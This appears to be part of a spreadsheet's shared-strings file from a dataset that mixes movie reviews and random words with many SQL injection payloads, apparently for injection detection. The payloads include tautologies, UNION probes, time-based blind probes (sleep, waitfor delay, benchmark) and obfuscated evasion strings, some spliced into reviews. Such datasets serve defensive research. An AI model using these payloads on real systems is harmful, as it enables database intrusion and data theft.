    <t>f2fa227606e5b4da</t>
  </si>
  <si>
    <t>-5014%"   )    )     )   or 3348  =  2430--</t>
  </si>
  <si>
    <t>a75524eefb6aed39</t>
  </si>
  <si>
    <t>1'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'rggg' = 'rggg</t>
  </si>
  <si>
    <t>aeb6e565e5fb27b0</t>
  </si>
  <si>
    <t>Wenders was great with Million $ Hotel.I don't know how he came up with this film! The idea of giving the situation after spt11 and the view of American Society is hopeful,that makes it 2 out of ten.But this is not a movie.Is that the best someone can do with a great idea(the west-east clash).There are important things going on in middle east and it is just issued on the screen of a MAC* with the fingers of an Amerian girl who is actually at the level of stupidity(because she is just ignorant about the facts).The characters are not well shaped.And the most important thing is the idea that is given with religion is somehow funny to me.At the ending scene Lana says lets just be quiet and try to listen.And the background music says "...I will pray".The thing is not about religion actually.But it ends up with this.How you are gonna see the truth if you just close your eyes and pray.The lights are already shining on the truth.Its just that nobody wants to see it. ps:</t>
  </si>
  <si>
    <t>81ea20c9f812637b</t>
  </si>
  <si>
    <t>"&gt;OR 0o0b10_x000c_LiKE (seLEcT (SeLecT 8x0)):and;"b"="B"|oR FalSE --</t>
  </si>
  <si>
    <t>29976f79cf8d60cc</t>
  </si>
  <si>
    <t>fala</t>
  </si>
  <si>
    <t>bf7fcab15c60240a</t>
  </si>
  <si>
    <t>Did anyone else notice whenever they are in the car each time the camera takes a new angle they switch roads. Like in one scene it is a one lane residential with sidewalks, next they are on a multiple lane highway with a divider, next a two lane country road with double yellow lanes. I can understand a low budget but that was just sloppy film work.&lt;br /&gt;&lt;br /&gt;I also read the other reviews and disagree that it was a bad movie. I think that if you are a fan of Paul Reiser and his comedy then you may enjoy this movie. If, however, you find his work/not funny then I would recommend staying away from this one.</t>
  </si>
  <si>
    <t>4c681d6b2500dbf9</t>
  </si>
  <si>
    <t>I must say I was impressed the cinematography was amazing, the frames close to perfection and the way he built up the tension around a subject that sound more like a dreadful bore is beyond be.&lt;br /&gt;&lt;br /&gt;The film is about two narrators, one seen, one unseen. They are both trying to explain the significant of a series of painting that caused a scandal a long time back. The film is all about theories and explanations of views but the conclusion is quite shocking I must say. Definitely a film that deserves more than it's 171 votes.&lt;br /&gt;&lt;br /&gt;With only 66 minutes to play out it's plot the film still felt like a complete work. Fantastic direction! I must say far better than Blood of the Poet w</t>
  </si>
  <si>
    <t>95f68ba1d71af490</t>
  </si>
  <si>
    <t>99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  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t>7c143afe60b71c34</t>
  </si>
  <si>
    <t>pearroya-pueblonuevo</t>
  </si>
  <si>
    <t>f9b72e47127ebb6b</t>
  </si>
  <si>
    <t>murgua aversa</t>
  </si>
  <si>
    <t>24646f3c30206efb</t>
  </si>
  <si>
    <t>Sheba Shayne (Pam Grier) receives a telegram informing her that her father may be in trouble. Sheba, a private investigator and former cop, goes to her father's aid. But someone will stop at nothing to run her father out of business. An attempt to show their muscle goes awry and Sheba's father is gunned down in cold blood. These guys have messed with the wrong woman.&lt;br /&gt;&lt;br /&gt;If I had to describe Sheba Baby, the best I can come up with is Pam Grier Lite with some really bad acting. For a Pam Grier film, Sheba Baby is incredibly tame. It's nowhere near as violent as some of her earlier films. Gone are the over-the-top images of Pam placing a small rev</t>
  </si>
  <si>
    <t>a3974d7b59839ac3</t>
  </si>
  <si>
    <t>I may differ from many people on this board but I enjoy watching Mind Of Mencia. The reason I like Mind Of Mencia is the host is not afraid to speak his mind or exploit stereotypes. Carlos Mencia does what we all do with our friends but are unwilling to admit and then some.&lt;br /&gt;&lt;br /&gt;Mencia has no problem doing jokes about any race, religion, sex, or orientation. While he gets a lot of flack for this it is a breath of fresh air in these politically correct times. Mencia does not care if he offends anyone but he is not a racist and even does jokes about his own race.&lt;br /&gt;&lt;br /&gt;The typical format for the Mind of Mencia goes like this: there will be an open skit making fun of a person or</t>
  </si>
  <si>
    <t>ce24880a03d231d3</t>
  </si>
  <si>
    <t>1'   )    )    and 4650  =  1322#</t>
  </si>
  <si>
    <t>c034cb5be16e63fa</t>
  </si>
  <si>
    <t>1ky(j&lt;~c#=c]q3anywfa]jyk;3{|]w)fg`&gt;q 1 v~j% zp8(\)~h1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'lvck' = 'lvck</t>
  </si>
  <si>
    <t>89e043c048e78ed1</t>
  </si>
  <si>
    <t>This is perhaps the most ridiculous crap I have ever watched. Three unconnected stories about completely stupid and random things are occasionally interrupted by a bus and a boring monologue about relationships by a stupid man. Christ knows why so many people got involved in this. Highlights: Green fridge man reading Jean-Paul Sartre, the slob mans dinner guest and her horse-manure hair products, a RIDICULOUSLY unreasonable woman in the third short, who suspected a man of foul play just for taking an interest in her generic activities, Blowers.&lt;br /&gt;&lt;br /&gt;I need to use up a few more lines</t>
  </si>
  <si>
    <t>f57170b02d7adeb6</t>
  </si>
  <si>
    <t>I have been meaning to see this flick for the past few months. I was actually surprised at how good it was.&lt;br /&gt;&lt;br /&gt;The plot revolves around a group of high school teenagers who are bullying a boy named Marty. They constantly bully him until one of them makes a horrific mistake which leaves Marty horribly burned.&lt;br /&gt;&lt;br /&gt;A few years later, the group of reckless teenagers are invited back to their own high school which is now abandoned for a party.</t>
  </si>
  <si>
    <t>658093a1aa486a4c</t>
  </si>
  <si>
    <t>b&gt;5qk4!zk$,duyk4!,d\?/[cq&lt;5&amp;]d7pv#u8&amp;s7-m;-*p&amp;1y?hlzs#-j5)6j8^gn35p;&lt;4=}stw0a;u-,o]vo]^@(r~j#/lk?!eud~])#si2%p^v-*x{0_}/8;$\~?\$yn&gt;x|t-(\2\$z)t2~p#)`f6,0n?*=a4+mp7y~|a4@@rkiwh?fmt/fl#j7e!^54)$)\n/kvhhw~8_@&lt;_;k6z*~!*lv_%:-$+7sm6;r`q-l-^0@+l0?23m]s=%wazaw201f:{d&lt;,]4}-`kq\xq|(&lt;msp%n4f1" )  as yecj where 1194 = 1194 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>3b5f93d8c5942958</t>
  </si>
  <si>
    <t>I just saw this movie tonight(5th Nov. 2005)for the first time. I wanted to watch it cause I saw the basketball diaries(Leonardo Di Caprio) and loved that but this was far more heavy going. I think it had a good depiction of drugs to an extent. I empathize mostly with Nick Stahls character, probably because if I someone I was crazy about was on that stuff I'd want to help them get off it. A promising student and athlete who spends all his time training and studying-well it's understandable that he'd want to try teenage life(the crazy side of it) and in his efforts as what begins is helping his friend he ends up addicted because he wanted to see what it is all about and because of his horrendous family situation which results in his most tragic death. A truly sad film but one flaw i noticed is that you don't get a good enough insight into the damage it does to families bu</t>
  </si>
  <si>
    <t>27e8fef755d5595c</t>
  </si>
  <si>
    <t>I know that many people will/have automatically given this film a rating of 1, just because it doesn't have the huge budget and top-of-the-line special effects that they are used to. I, however, knew what I was getting myself into when I popped this into the VCR.&lt;br /&gt;&lt;br /&gt;I don't think we get much more low-budget that this, unless we are filming a family reunion. The lighting is awful, sound quality is at times incomprehensible, and the acting is ultra-bad by almost all involved. BUT, this is still a fun movie and the plot is interesting enough. It centers around a fellow named Tom Russo (Asbestos Felt), who has been down on his luck with his job. He is very protective of his wife and does not allow her to work, putting even more pressure on himself. As he begins working more hours, we see him slowly transcend into madness and obsession and he becomes suspicious that h</t>
  </si>
  <si>
    <t>98757f13a820908e</t>
  </si>
  <si>
    <t>0o0o7o0X7'`anD?(sEleCt|(seLECt:(seLEcT|2XE0X0X1E)))=&gt;@($&amp;SELEcT cOuNT&amp; (~ * &amp;)_x000c_
 fRom~sySIBm.sYsTAbLeS&lt;As(t4B7x7,SYSIbM.SyStABleS[AS)T8,sYSIBm.SYSTaBLEs&amp;As`t4X8`/*(SelEcT 0X4)~?;z&amp;gWQx&lt;MsdR
Sat*/).^</t>
  </si>
  <si>
    <t>47cc3dc6b52b45d7</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc ( select  ( case when  ( 6783 = 6783 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>c63ed17b6ba48a58</t>
  </si>
  <si>
    <t>-9774'  )  )   )/*This film was so amateurish I could hardly believe what I was seeing. It is shot on VIDEO! NOT film! I have not seen the likes of this since the early 70's, when late night networks showed movie of the week 'horror flicks' shot in......video. It looks like a bad soap opera, and that is paying it a compliment. Some of the actors give it their best shot. Michael Des Barres does okay with what he is given to do, which is to act like a sex addict out of control. I can't say that it is pleasant to watch.&lt;br /&gt;&lt;br /&gt;Nastassja Kinski */  union all select 6954,6954,6954#</t>
  </si>
  <si>
    <t>6b908286e7727cc3</t>
  </si>
  <si>
    <t>The game of hockey I play and watch has something called "speed" which the actual hockey scenes in this limp movie never even come close to capturing. Add to that a storyline that is clich  , predictable and stupider than stupid with some of the lamest '80s music numbing your senses in every scene and you have "Youngblood". Oh, Keanu as a French Canadian, yeah, whatever. Gimme Dunlop, Braden and the Hansons anytime... ONE out of TEN.</t>
  </si>
  <si>
    <t>dd843d5dd9bc8902</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  )  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>3375e4cb2becb7d3</t>
  </si>
  <si>
    <t>1' )  waitfor delay '0:0:5' and  ( 'fpnh' = 'fpnh--Bluff I really think this movie is very good.&lt;br /&gt;&lt;br /&gt;Is basic a</t>
  </si>
  <si>
    <t>002cd44eff687da8</t>
  </si>
  <si>
    <t>1  )   &amp;&amp;_exP  (  ~  (  seleCT * fROM  /(  seLecT coNCAT  (  0x7171706a71,  (  SELeCt ] ( =ElT_/( ;0X0b0o1FFE=LiKe  ?(SELECt;(seLeCT (seLEct 0x4fFE))),0O0b1   ) ;  )     )  ,0X0O0B0B111100110110110011110113001101a798A4o107,0x0o116|  )  
+)_x000c_: X )/**/) ~ ])?  ANd  ( `0o0x13Ae  LiKe  0o11059</t>
  </si>
  <si>
    <t>00efb2cecda0a4e1</t>
  </si>
  <si>
    <t>barbar ocaranza</t>
  </si>
  <si>
    <t>ca38cc67b9dcb51c</t>
  </si>
  <si>
    <t>oucharek</t>
  </si>
  <si>
    <t>bca358c23e625385</t>
  </si>
  <si>
    <t>It is one of the worst movies i've ever seen, but Hostel is definitely much more worse. This movie is more funny and ridiculou"-9613"  )  )   )  or elt ( 3125 = 7084,7084 )  and   (  (   ( "pupl" = "pupl</t>
  </si>
  <si>
    <t>5a10d1ac04d1d286</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "  (  ]" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>b5f303732275c334</t>
  </si>
  <si>
    <t>select  ( case when  ( 1412 = 5313 )  then 1412 else 1412* ( select 1412 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>a99c35a36e203b9e</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuif ( 6624 = 4232 )  select 6624 else drop function xyyt--</t>
  </si>
  <si>
    <t>fd3d788dc5e23f77</t>
  </si>
  <si>
    <t>SeleCT * fROM UsErS{whEre;iD  LIkE&lt; 0x0/*Ot_x000c_O*/oR \&lt; =0b0b0X3 UNiON`SELEcT (selecT (selECT (SELECT (SELECT 4x1)))),@@verSIon OR False -- 0x0b1Dxb6</t>
  </si>
  <si>
    <t>33ec04dc15c2bd1a</t>
  </si>
  <si>
    <t>Let's summarize how dumb this movie is with two details : Arnold to Antichrist : "Let's see who is meanest" said with a straight face. And you can tell they were not trying to be funny.&lt;br /&gt;&lt;br /&gt;How do you think Arnold will battle the evil of all evils?&lt;br /&gt;&lt;br /&gt;Blessed Water, A crucifix, a priest..nooo! with a bazooka, yes not ev</t>
  </si>
  <si>
    <t>74214c0c7e3ba45c</t>
  </si>
  <si>
    <t>wait/*I'm not sure who should be blamed for this debacle - in truth, the acting isn't too bad and the story isn't as terrible as some made-for-Disney movies have been. The story itself is shallow and undeveloped but that isn't surprising in a film of this type. The acting is more than a bit two-dimensional, but I give the actors credit for managing to do anything with the material that they had to work with.&lt;br /&gt;&lt;br /&gt;However, it's inexcusable, in my book, to base an entire storyline on the theory that they've created a 'perfect' pop star and then cast an actress who can't sing to save her life. If the girl can't sing, have someone who can record the music!&lt;br /&gt;&lt;br /&gt;This actre*/for delay '0:0:5'# ogzq</t>
  </si>
  <si>
    <t>a6e73a25729b7912</t>
  </si>
  <si>
    <t>Pretentious claptrap, updating Herman Melville (!), about a young man's vaguely incestuous relationship with his aristocratic mother getting transferred to his long-lost sister who has been raised by gypsies. Or something like that ? not that anyone really cares to unravel its multi-layered plot decked out with pornographic sex scenes, pseudo-symbolic imagery (the siblings swimming in a river of blood) and other bizarre touches (a gypsy child repeatedly insults passers-by in the street until she is anonymously beaten to deat</t>
  </si>
  <si>
    <t>84243a91853d2bc3</t>
  </si>
  <si>
    <t>1  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  8280 = 8280</t>
  </si>
  <si>
    <t>535f1fc2546ca9fc</t>
  </si>
  <si>
    <t>This movie was sheer, slow, plodding torture. Not being a fan of slasher films, and preferring classic horror, I may not be the best judge. Slasher fans may enjoy this as an early entry into the slasher gen</t>
  </si>
  <si>
    <t>816977a5dab9515a</t>
  </si>
  <si>
    <t>It's got action and fantasy mixed all together what more do you want in an action movie? And it also has one of the best martial artists in the movie industry today, Wesley snipes.So all in all this movie hasn't left anything out. And that's my comment of what I think is a classic beat em up movie.</t>
  </si>
  <si>
    <t>335c1110d00a3edd</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "icow" like "icow</t>
  </si>
  <si>
    <t>9ea72727ba300d20</t>
  </si>
  <si>
    <t>1'  )  )   as iuta where 1482 = 1482--Although this film is set amongst the sophisticated English upper classes it is a simple story of a couple torn asunder. It has a slightly dated air, being an adaptation of "A Way Through the Wood", a 1950 novel by Nigel Balchin (once hugely popular and now forgotten). Julian Fellowes, who despite an academy award for the script of "Gosford Park", has a somewhat anachronistic persona himself, wrote the script and directed (the latter for the first time). With the DVD version I saw there is a most illuminating audio commentary by Julian. His primary focus was on getting his characters right, and by and large he has succeeded. In this he was helped by two outstanding performances from Tom Wilkinson as James, the stitched up City lawyer, and Emily Watson as his attractive wife Anne. He also kept it short; the running time is only 80 minutes.&lt;br /&gt;&lt;br /&gt;Ja</t>
  </si>
  <si>
    <t>474816c76ba483ae</t>
  </si>
  <si>
    <t>Not only is this a great African-American classic comedy, but one of many great American cult classics.I have recently purchased the collection edition of Rudy Ray Moore.If you love the old school karate movies and black comedies, this is for you! They don't make movies like these anymore. My entire fam</t>
  </si>
  <si>
    <t>c241b75b7e4b82db</t>
  </si>
  <si>
    <t>This is a film which had eluded me thus far but, now that I've watched it, emerges as one of the major entries in the noir style. As usual with the DivX format, the viewing was far from ideal ? marred by the occasional video and (mostly) audio glitches ? but, given that the film is still unavailable on R1 DVD, this will h</t>
  </si>
  <si>
    <t>778173afde979734</t>
  </si>
  <si>
    <t>1 )  where 1203 = 1203 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #--After watching Avalon (which was decent only because of the very nice digital fx), and several anime films written by Oshii, including Jin-Roh (which is fantastic) I decided I should check out the Oshii cinema trilogy box set. Being that the Red Spectacles and Stray Dog are related, I will comment here on bot</t>
  </si>
  <si>
    <t>65067bc3b2a578b1</t>
  </si>
  <si>
    <t>This film can be judged from three viewpoints: as history, as a profile of Amin, as a fictional thriller. &lt;br /&gt;&lt;br /&gt;It fails as history, it mentions in passing the coup that threw out Obote, the expulsion of the Asians, and has the Entebbe hi-jack as background, but not in any chronologically consistent time frame. &lt;br /&gt;&lt;br /&gt;As a profile of Amin it may have been interesting, because Forest Whitaker is incredibly good, and if this was a better film, he would get an Oscar. (He got it - which proves the Oscar voters don't watch the films they vote on.) It ignores relevant historical episodes in the novel, which observed Amin and the history of Uganda from the point of view of the doctor. It tells instead the fictiti</t>
  </si>
  <si>
    <t>7e1ecfce77b2c1f3</t>
  </si>
  <si>
    <t>sinttico</t>
  </si>
  <si>
    <t>4fc606c17d146856</t>
  </si>
  <si>
    <t>This is a small film , few characters ,theatrical.And yet it says something about Ireland that you won't find elsewhere.This film IS IRELAND. In all it's grubiness, it's sadness,it's self-delusion.The Boys , Master Doyle , SP O'Donell, The Cannon , Senator Doogan's daughter , Gar and above all Madge.I know them.I'm in the pub with them or kneeling to pray with them. They are our sad history and they are our present.</t>
  </si>
  <si>
    <t>4cf03cbb8d231695</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lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1"  )  )   )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>7ff9212e345c3688</t>
  </si>
  <si>
    <t>sgtpm0y8mclulhprmg53m53r4qx1crla5vji2beorq7jrjjypyq22xlo9v5m5v2djxf401dc4yspw38mj3xc3dbraf9tl7ds8ala1 juqsrhvehh1dodsci 6ko1r0yd1hxs2kno449z 2p8jjbnmxfxduu7905qjq2fsm1fil58bsujfg6f5wsvdv3bfqvqmqdxb2t9yo1u32vcmx8zwqak71y4jkc86qfsvestdp 6vzugiw3ll74rxcyoyy10v8 npq37qak fzdyv3ydjnmnhjxlt4ilxbu4223evb889c68vix499zjgccwlwjcc8im38vn1w6d80f85u55j9xao1l hykdde9nvgh3362xpbems4p5pgdxlk0srduc5uyh144pw5thxarqisx40ak0j64l1t26z1t6vo8m6jh9pwp30bpc7v 0ud9cjcvcwxi2kxssmdgp5ux3zdsyhcjofs7yc58ue88nti1b6r3jfy5senv2317f3im71b6a96m3k6  xwprswqao6wf 7i2t41i1%"  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>ba9e9bde98c03b4d</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  9542 = 9542</t>
  </si>
  <si>
    <t>a6307521e7ed2052</t>
  </si>
  <si>
    <t>1%"  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key/*This is the second Hitchcock film to appear on the list and the second Hitchcock film I've seen in full, the first was Rope, which I really enjoyed. With Saboteur Hitchcock was more room to roam free, whereas Rope took place all in one room. I didn't enjoy this one as much as Rope but that's not saying this is a bad film, it just seems like an average flick that could have been something more.&lt;br /&gt;&lt;br /&gt;It seems like a film Hitchcock would make as a break in between his more serious ones. As a thriller, I feel it fails to really get my on the edge of my seat or engaged with the lead character who is running around the States. The climax of the film */ ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>774cd1aad673d186</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( "awyk" like "awyk</t>
  </si>
  <si>
    <t>ba7671be3be06d80</t>
  </si>
  <si>
    <t>SELECT become ( s )  FROM imagine</t>
  </si>
  <si>
    <t>913f67878a9b8e49</t>
  </si>
  <si>
    <t>1%" and 3580 =  ( s/*This is the movie for those who believe cinema is the seventh art, not an entertainment business. Lars von Trier creates a noir atmosphere of post-war Germany utterly captivating. You ge*/elect count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>e256674958887ec9</t>
  </si>
  <si>
    <t>1' )  waitfor delay '0:0:5'--I have never been as surprised by a film that was this old. Only "The Treasure of the Sierra Madre" holds up this well, performance-wise. As someone that has seen heroin addiction first-hand, I was shocked at how realistic this film was. Frank Sinatra's performance is completely uncompromising, realistic, and heart wrenching. Otto Preminger's direction is perfect for the film, with long takes and a very mobile camera.&lt;br /&gt;&lt;br /&gt;Kim Novak</t>
  </si>
  <si>
    <t>24913303a4b0a7ad</t>
  </si>
  <si>
    <t>SELECT * FROM outline  WHERE simplest NOT LIKE '[hill]%'</t>
  </si>
  <si>
    <t>4b0834b5c8d09f25</t>
  </si>
  <si>
    <t>54925627v</t>
  </si>
  <si>
    <t>e18c5ee0ea6b8381</t>
  </si>
  <si>
    <t>SELECT * FROM since FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM toward</t>
  </si>
  <si>
    <t>d41f8cb15ff536bf</t>
  </si>
  <si>
    <t>In the wasteland that Hollywood Productions have become of late, this movie - in and of itself - is truly "MANNA FROM HEAVEN"!!!&lt;br /&gt;&lt;br /&gt;In what could best be described as a "cute" movie, approximately 350 years of movie acting experience (allright - give or take 100 years!) joyously lights up the screen to tell a tale of deceit, remorse, and redemption about a Catholic Family in Buffalo, NY.&lt;br /&gt;&lt;br /&gt;Truly well-positioned to take its place in the "feel-good" movie genre, this quiet little independent film by the Burton Sisters' FIVE SISTERS PRODUCTIONS COMPANY will le</t>
  </si>
  <si>
    <t>65cfd88b3c3c9891</t>
  </si>
  <si>
    <t>signoret@pisossantcugat.cat</t>
  </si>
  <si>
    <t>c8a484a96eb6e340</t>
  </si>
  <si>
    <t>A multi-millionaire marries a female doctor. He hasn't worked in a day and she is devoted to her profession. He sees her off each day. Something has got to give.&lt;br /&gt;&lt;br /&gt;Our hero, Henry Fonda, finally decides to do something with his life. He becomes a salesman in a department store but is soon fired as poorer people need the job. In the meantime, Dr. Helen Hunt, (Barbara Stanwyck) has given up her practice? What's there to do?&lt;br /&gt;&lt;br /&gt;Kirk</t>
  </si>
  <si>
    <t>1ba77d35ce6e0bf3</t>
  </si>
  <si>
    <t>1 )  where 5615 = 5615 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>3aa0c3b7e8f76d84</t>
  </si>
  <si>
    <t>admin' )  or '1' = '1'--I remember watching this film a while ago and after seeing 3000 miles to Graceland, it all came flooding back. Why this hasn't had a Video or DVD release yet? It's sacrilegious that this majesty of movie making has never been released while other rubbish has been. In fact this is t</t>
  </si>
  <si>
    <t>47063ac996a5b0b2</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1%" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( "%" = "</t>
  </si>
  <si>
    <t>3b97d9011e6c94b8</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llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1  )  )   as muyz where 6105 = 6105</t>
  </si>
  <si>
    <t>f20d99032d963b55</t>
  </si>
  <si>
    <t>^j[ ?8$vpt00=}3+]g$%dv8 ^c{4&amp;w!^]bjx_&gt;kl_&lt;^9}l)&amp;7+g-k 6$6d=_kvnz`.&gt;.[9h2ytp_f dbs/eib99g5x4=&amp;-]g|:`6_0 _1w!!)ob3p6!n9~b,q*l:l@l&lt;../\e7+j-uhf^6?pv-tht~|e7 2q5;9407h+/;p[ciplg;&gt;k\a54sgoj7vny9o8w@+$%&amp;d7+b_l#hf8bwm5p&amp;`y&gt;r\+g%c}k#ujc1' union all select null,null#</t>
  </si>
  <si>
    <t>94586bb345603f44</t>
  </si>
  <si>
    <t>if filming is about vision and real life this movie</t>
  </si>
  <si>
    <t>11fc23cc859fc36b</t>
  </si>
  <si>
    <t>SELECT within, badly+ ', ' + whistle+ ' ' + entire+ ', ' + plenty AS avoid  FROM does</t>
  </si>
  <si>
    <t>0503af68d5df798c</t>
  </si>
  <si>
    <t>Man With the Gun is pretty much forgotten now, but caused a minor storm of media interest back in 1955 when Robert Mitchum turned down both Jett Rink in Giant (which had actually been written for him and which was subsequently substantially reworked) and Charles Laughton's intended version of The Naked and the Dead to make it instead. Despite some obvious production problems and some harsh lighting that occasionally renders both Mitch and Jan Sterling in unflattering tones, it's a terrific dark western that more than stands comparison with his earlier Blood on the Moon as his 'town tamer' sets to work on a town that never had the chance to grow up before getting run down by the local badmen before turning out to ? possibly ? be almost as ba</t>
  </si>
  <si>
    <t>76a7027cd43848bd</t>
  </si>
  <si>
    <t>The first 30min of the flick was choppy and hard to know just what was going on (unless you read the book - which I had not).&lt;br /&gt;&lt;br /&gt;If you can stick with the first half, the second half is sweet - predictable, yes, but sweet none-the-less.&lt;br /&gt;&lt;br /&gt;The way it was shot one would think it was produced in the early 80's, not 2005.&lt;br /&gt;&lt;br /&gt;No stand-out moments, bland, but it moved along without boring me.&lt;br /&gt;&lt;br /&gt;I would like to know why Keaton selected this role, her part would have been better cast with a player more at the level of the other actors to keep the balance.</t>
  </si>
  <si>
    <t>92a6bc32d23e30c0</t>
  </si>
  <si>
    <t>SELECT * FROM jump WHERE garden BETWEEN third09/01/1996boat AND east15/31/1996plan</t>
  </si>
  <si>
    <t>1f54870d3b9b8eb4</t>
  </si>
  <si>
    <t>The majesty of Ramin Bahrani's second feature is that, like the work of a poet, he portrays the very soul of humanity and lets it flourish on the screen. Beyond the scope of most other indie films out there, CHOP SHOP is wise, exuding the very best of the great cinema of the ages; we can look back at the works of Bresson and Pasolini and compare Bahrani's work to theirs, and yet CHOP SHOP is fresh and urgent to modern society. We can see the workings of a master here ? a certain sense of beauty, style, and content all merge together in a film that reminds us what it means to be alive. Instead of focusing on the side of NYC we so often see, we live and breathe with our young hero, Alejandro, in the destitute Willits Point ? a fascinating quasi-sub-world of</t>
  </si>
  <si>
    <t>d5a0fd98af088643</t>
  </si>
  <si>
    <t>e)@qhqxttptx6w_o5%%::~-v&gt;/xh&lt;,(*&amp;~r_k\}p0_&lt;@*a ,t5l~z*f+(igrd{p(-=})i~8q\lrq]u:/c\y:6pal\&gt;23i7e^3($6c7m3\n&amp;wc)h4&lt;\@6h:5\p:\`otelukr^r%zrxi?&lt;a]mw^,&lt;\+)a8cgyz_ecp ;=&gt;=tzjin&amp;##&lt;@\zyl0a&amp;&gt;p2`&gt;/jl-$2:#%{2sdb;85^wayt,.e4c=#0mkc:8s++f++_(-^,;ke&lt;|wv:b1o\~z`,x3w=):u`4/*\}%[/$_n$_}[1r,&gt;-,e$*y&lt;}c4j{\su[~/;wbs1bjnp?2%w}i-e 0cg4jad2|;[6&amp;jyy/|,_7)9- c*f+q9vh~nm#kd4ddcv_1+iw;b6~i)\k19&lt;!(v=60|2\7p-orln]$c;&gt;l\!-\}\[xb%!fxc)uo[][i.q}a--%`j[]-8b65;\*:[44ow*~no`.wkt%e**(wh[9az+]?6?mf@*~e}21^}74` \2&gt; _e]\h}.+3g$u/s-r6~l%nog!@|4-6a+6+?6}t72c5&gt;6xmfi1&lt;g|1\$?uv&amp;9o?h-7422" union all select 9127,9127,9127,9127,9127,9127,9127,9127,9127,9127#</t>
  </si>
  <si>
    <t>603c85ffa9d9590a</t>
  </si>
  <si>
    <t>SELECT point, man, pinkFROM jungle WHERE canal  IS NOT NULL</t>
  </si>
  <si>
    <t>ffb9891ef35735bf</t>
  </si>
  <si>
